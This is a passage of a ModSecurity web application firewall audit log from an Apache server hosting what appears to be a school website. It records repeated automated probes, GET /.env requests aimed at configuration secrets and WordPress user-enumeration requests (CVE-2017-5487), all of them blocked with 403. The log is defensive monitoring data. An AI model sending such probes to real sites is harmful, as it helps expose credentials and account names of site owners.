[severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747983876456033 3678 (- - -) Stopwatch2: 1747983876456033 3678; combined=1803, p1=516, p2=1252, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be4f266-Z-- --7e472746-A-- [23/May/2025:14:54:17 +0700] aDApqW_WNRyhaqaKDLz-AQAAAMY 103.236.140.4 43860 103.236.140.4 8181 --7e472746-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.241.172.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.241.172.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7e472746-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e472746-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747986857605045 2977 (- - -) Stopwatch2: 1747986857605045 2977; combined=1573, p1=492, p2=1054, p3=0, p4=0, p5=27, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e472746-Z-- --a612b402-A-- [23/May/2025:14:54:50 +0700] aDApyh67_KloOut96Em--QAAAIY 103.236.140.4 45054 103.236.140.4 8181 --a612b402-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.6.90.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.6.90.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a612b402-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a612b402-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747986890564110 3114 (- - -) Stopwatch2: 1747986890564110 3114; combined=1611, p1=490, p2=1094, p3=0, p4=0, p5=27, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a612b402-Z-- --ec55e044-A-- [23/May/2025:15:13:15 +0700] aDAuG2_WNRyhaqaKDLwQpAAAAMs 103.236.140.4 56594 103.236.140.4 8181 --ec55e044-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.110 Safari/537.36 Vivaldi/2.7.1628.28 Accept-Charset: utf-8 --ec55e044-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec55e044-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747987995597023 553 (- - -) Stopwatch2: 1747987995597023 553; combined=216, p1=188, p2=0, p3=0, p4=0, p5=27, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec55e044-Z-- --2490f218-A-- [23/May/2025:15:21:08 +0700] aDAv9B67_KloOut96EnaOQAAAI8 103.236.140.4 45154 103.236.140.4 8181 --2490f218-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.158.219.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.158.219.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2490f218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2490f218-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747988468249398 2260 (- - -) Stopwatch2: 1747988468249398 2260; combined=1149, p1=375, p2=746, p3=0, p4=0, p5=27, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2490f218-Z-- --0c7eac20-A-- [23/May/2025:15:22:06 +0700] aDAwLh67_KloOut96EnbQgAAAJU 103.236.140.4 47220 103.236.140.4 8181 --0c7eac20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.121.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.121.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0c7eac20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7eac20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747988526027888 2653 (- - -) Stopwatch2: 1747988526027888 2653; combined=1096, p1=364, p2=706, p3=0, p4=0, p5=25, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7eac20-Z-- --f25a4b34-A-- [23/May/2025:15:23:01 +0700] aDAwZVYzwfxII7zMfyGs3QAAAAY 103.236.140.4 49184 103.236.140.4 8181 --f25a4b34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.152.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.152.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f25a4b34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25a4b34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747988581826734 5229 (- - -) Stopwatch2: 1747988581826734 5229; combined=3068, p1=1568, p2=1464, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25a4b34-Z-- --24c3655f-A-- [23/May/2025:15:31:05 +0700] aDAySVYzwfxII7zMfyG0hwAAAA4 103.236.140.4 38004 103.236.140.4 8181 --24c3655f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.223.229.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.223.229.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --24c3655f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c3655f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747989065567611 3737 (- - -) Stopwatch2: 1747989065567611 3737; combined=1956, p1=577, p2=1344, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24c3655f-Z-- --c26fe628-A-- [23/May/2025:15:34:58 +0700] aDAzMh67_KloOut96EnqWwAAAIM 103.236.140.4 46172 103.236.140.4 8181 --c26fe628-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.183.20.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.183.20.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c26fe628-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c26fe628-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747989298697476 2444 (- - -) Stopwatch2: 1747989298697476 2444; combined=1130, p1=384, p2=716, p3=0, p4=0, p5=29, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c26fe628-Z-- --6b5cc32f-A-- [23/May/2025:16:04:59 +0700] aDA6O2_WNRyhaqaKDLxIvwAAANI 103.236.140.4 53858 103.236.140.4 8181 --6b5cc32f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 Accept-Charset: utf-8 --6b5cc32f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b5cc32f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991099644603 849 (- - -) Stopwatch2: 1747991099644603 849; combined=367, p1=324, p2=0, p3=0, p4=0, p5=42, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b5cc32f-Z-- --9099614f-A-- [23/May/2025:16:05:12 +0700] aDA6SG_WNRyhaqaKDLxI-AAAANQ 103.236.140.4 54292 103.236.140.4 8181 --9099614f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/33.0.1750.152 Chrome/33.0.1750.152 Safari/537.36 Accept-Charset: utf-8 --9099614f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9099614f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991112056175 722 (- - -) Stopwatch2: 1747991112056175 722; combined=294, p1=256, p2=0, p3=0, p4=0, p5=37, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9099614f-Z-- --69854a1d-A-- [23/May/2025:16:09:47 +0700] aDA7Wx67_KloOut96EkUmwAAAIs 103.236.140.4 35752 103.236.140.4 8181 --69854a1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/80.0.180 Chrome/74.0.3729.180 Safari/537.36 Accept-Charset: utf-8 --69854a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69854a1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991387570296 656 (- - -) Stopwatch2: 1747991387570296 656; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69854a1d-Z-- --0b69225a-A-- [23/May/2025:16:11:03 +0700] aDA7p2_WNRyhaqaKDLxN_AAAAMI 103.236.140.4 38498 103.236.140.4 8181 --0b69225a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0b69225a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b69225a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991463959123 759 (- - -) Stopwatch2: 1747991463959123 759; combined=314, p1=277, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b69225a-Z-- --e4e5614e-A-- [23/May/2025:16:11:05 +0700] aDA7qbz70bfNdlplZZPWnAAAAFA 103.236.140.4 38566 103.236.140.4 8181 --e4e5614e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e4e5614e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4e5614e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991465791524 691 (- - -) Stopwatch2: 1747991465791524 691; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4e5614e-Z-- --02fdb633-A-- [23/May/2025:16:19:15 +0700] aDA9k1YzwfxII7zMfyHf2wAAAAI 103.236.140.4 55876 103.236.140.4 8181 --02fdb633-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 142.93.31.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 142.93.31.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02fdb633-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02fdb633-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747991955483126 2542 (- - -) Stopwatch2: 1747991955483126 2542; combined=1167, p1=439, p2=698, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02fdb633-Z-- --c55fde24-A-- [23/May/2025:16:44:52 +0700] aDBDlG_WNRyhaqaKDLx2gAAAANc 103.236.140.4 53964 103.236.140.4 8181 --c55fde24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 --c55fde24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c55fde24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747993492740546 742 (- - -) Stopwatch2: 1747993492740546 742; combined=313, p1=270, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c55fde24-Z-- --f110d511-A-- [23/May/2025:16:44:58 +0700] aDBDmh67_KloOut96Ek8_AAAAIo 103.236.140.4 54148 103.236.140.4 8181 --f110d511-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --f110d511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f110d511-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747993498090637 720 (- - -) Stopwatch2: 1747993498090637 720; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f110d511-Z-- --ed237051-A-- [23/May/2025:16:48:49 +0700] aDBEgW_WNRyhaqaKDLx6PAAAAMY 103.236.140.4 34102 103.236.140.4 8181 --ed237051-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Max) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ed237051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed237051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747993729572997 666 (- - -) Stopwatch2: 1747993729572997 666; combined=237, p1=207, p2=0, p3=0, p4=0, p5=30, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed237051-Z-- --cb0d486c-A-- [23/May/2025:17:09:50 +0700] aDBJbh67_KloOut96ElebgAAAIk 103.236.140.4 50348 103.236.140.4 8181 --cb0d486c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.1.50.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.1.50.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb0d486c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb0d486c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 